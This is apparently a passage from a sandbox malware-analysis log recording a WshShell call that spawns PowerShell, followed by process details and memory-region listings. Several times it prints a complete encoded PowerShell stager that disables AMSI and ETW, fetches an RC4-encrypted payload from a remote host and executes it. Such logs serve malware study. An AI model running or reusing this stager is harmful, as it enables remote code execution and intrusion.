BbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x5fff365c80, puArgErr=0x5fff365c60 | out: pDispParams=0x5fff365c68*(rgvarg=([0]=0x1fe18ebc3f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x5fff365c80*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5fff365c60*=0x1afb8cd0) returned 0x0 [0176.185] WshShell:IUnknown:Release (This=0x1fe12be9b30) returned 0x0 Thread: id = 16 os_tid = 0x1250 Thread: id = 17 os_tid = 0x1248 Thread: id = 18 os_tid = 0x1c0 Thread: id = 19 os_tid = 0x1168 Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4702f000" os_pid = "0x61c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13ac" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Documents\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 686 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 687 start_va = 0x653de60000 end_va = 0x653dedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653de60000" filename = "" Region: id = 688 start_va = 0x653e000000 end_va = 0x653e1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e000000" filename = "" Region: id = 689 start_va = 0x25b59780000 end_va = 0x25b5979ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59780000" filename = "" Region: id = 690 start_va = 0x25b597a0000 end_va = 0x25b597b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b597a0000" filename = "" Region: id = 691 start_va = 0x25b597c0000 end_va = 0x25b597c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b597c0000" filename = "" Region: id = 692 start_va = 0x25b597d0000 end_va = 0x25b597d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b597d0000" filename = "" Region: id = 693 start_va = 0x25b597e0000 end_va = 0x25b597e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b597e0000" filename = "" Region: id = 694 start_va = 0x7df5ff010000 end_va = 0x7ff5ff00ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff010000" filename = "" Region: id = 695 start_va = 0x7ff6ab8b0000 end_va = 0x7ff6ab8d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ab8b0000" filename = "" Region: id = 696 start_va = 0x7ff6aba70000 end_va = 0x7ff6abae7fff monitored = 0 entry_point = 0x7ff6aba731a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 697 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 721 start_va = 0x25b597f0000 end_va = 0x25b5993ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b597f0000" filename = "" Region: id = 722 start_va = 0x7fffefeb0000 end_va = 0x7fffeff5cfff monitored = 0 entry_point = 0x7fffefec81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 723 start_va = 0x7fffece50000 end_va = 0x7fffed037fff monitored = 0 entry_point = 0x7fffece7ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 724 start_va = 0x25b59780000 end_va = 0x25b5978ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59780000" filename = "" Region: id = 725 start_va = 0x7ff6ab7b0000 end_va = 0x7ff6ab8affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ab7b0000" filename = "" Region: id = 726 start_va = 0x25b59940000 end_va = 0x25b599fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 806 start_va = 0x7fffedd80000 end_va = 0x7fffede26fff monitored = 0 entry_point = 0x7fffedd958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 807 start_va = 0x7ffff0700000 end_va = 0x7ffff079cfff monitored = 0 entry_point = 0x7ffff07078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 808 start_va = 0x653dee0000 end_va = 0x653df5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653dee0000" filename = "" Region: id = 809 start_va = 0x7fffedba0000 end_va = 0x7fffedbfafff monitored = 0 entry_point = 0x7fffedbb38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 810 start_va = 0x7fffefd90000 end_va = 0x7fffefeabfff monitored = 0 entry_point = 0x7fffefdd02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 811 start_va = 0x7ffff05b0000 end_va = 0x7ffff06f2fff monitored = 0 entry_point = 0x7ffff05d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 812 start_va = 0x7fffef9f0000 end_va = 0x7fffefc6cfff monitored = 0 entry_point = 0x7fffefac4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 813 start_va = 0x7fffed740000 end_va = 0x7fffed7a9fff monitored = 0 entry_point = 0x7fffed776d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 814 start_va = 0x25b59790000 end_va = 0x25b59796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59790000" filename = "" Region: id = 815 start_va = 0x7ffff0340000 end_va = 0x7ffff04c5fff monitored = 0 entry_point = 0x7ffff038ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 816 start_va = 0x7fffeff60000 end_va = 0x7ffff00b5fff monitored = 0 entry_point = 0x7fffeff6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 817 start_va = 0x7ffff00c0000 end_va = 0x7ffff0180fff monitored = 0 entry_point = 0x7ffff00e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 818 start_va = 0x7fffdc1e0000 end_va = 0x7fffdc1fdfff monitored = 0 entry_point = 0x7fffdc1e3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 819 start_va = 0x7fffe4980000 end_va = 0x7fffe49e7fff monitored = 1 entry_point = 0x7fffe4984970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 820 start_va = 0x25b59a00000 end_va = 0x25b59b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59a00000" filename = "" Region: id = 821 start_va = 0x25b597f0000 end_va = 0x25b597f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b597f0000" filename = "" Region: id = 822 start_va = 0x25b59840000 end_va = 0x25b5993ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59840000" filename = "" Region: id = 823 start_va = 0x25b59800000 end_va = 0x25b59838fff monitored = 0 entry_point = 0x25b598012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 824 start_va = 0x25b59b20000 end_va = 0x25b59ca7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59b20000" filename = "" Region: id = 825 start_va = 0x7fffedf50000 end_va = 0x7fffedf8afff monitored = 0 entry_point = 0x7fffedf512f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 826 start_va = 0x25b59cb0000 end_va = 0x25b59e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59cb0000" filename = "" Region: id = 827 start_va = 0x25b59e40000 end_va = 0x25b5b23ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59e40000" filename = "" Region: id = 828 start_va = 0x25b59800000 end_va = 0x25b59802fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 829 start_va = 0x25b59810000 end_va = 0x25b59810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59810000" filename = "" Region: id = 830 start_va = 0x25b59820000 end_va = 0x25b59820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59820000" filename = "" Region: id = 831 start_va = 0x25b59a00000 end_va = 0x25b59aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59a00000" filename = "" Region: id = 832 start_va = 0x25b59b10000 end_va = 0x25b59b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59b10000" filename = "" Region: id = 833 start_va = 0x25b59830000 end_va = 0x25b59836fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59830000" filename = "" Region: id = 834 start_va = 0x25b5b240000 end_va = 0x25b5b31cfff monitored = 0 entry_point = 0x25b5b29e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 835 start_va = 0x7fffece40000 end_va = 0x7fffece4efff monitored = 0 entry_point = 0x7fffece43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 836 start_va = 0x7fffeb740000 end_va = 0x7fffeb7d5fff monitored = 0 entry_point = 0x7fffeb765570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 837 start_va = 0x25b5b240000 end_va = 0x25b5b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b240000" filename = "" Region: id = 838 start_va = 0x25b59a00000 end_va = 0x25b59a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a00000" filename = "" Region: id = 839 start_va = 0x25b59aa0000 end_va = 0x25b59aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59aa0000" filename = "" Region: id = 840 start_va = 0x7fffede30000 end_va = 0x7fffeded6fff monitored = 0 entry_point = 0x7fffede3b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 841 start_va = 0x25b59a10000 end_va = 0x25b59a10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a10000" filename = "" Region: id = 842 start_va = 0x7fffed0f0000 end_va = 0x7fffed733fff monitored = 0 entry_point = 0x7fffed2b64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 843 start_va = 0x7fffed8f0000 end_va = 0x7fffed932fff monitored = 0 entry_point = 0x7fffed904b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: 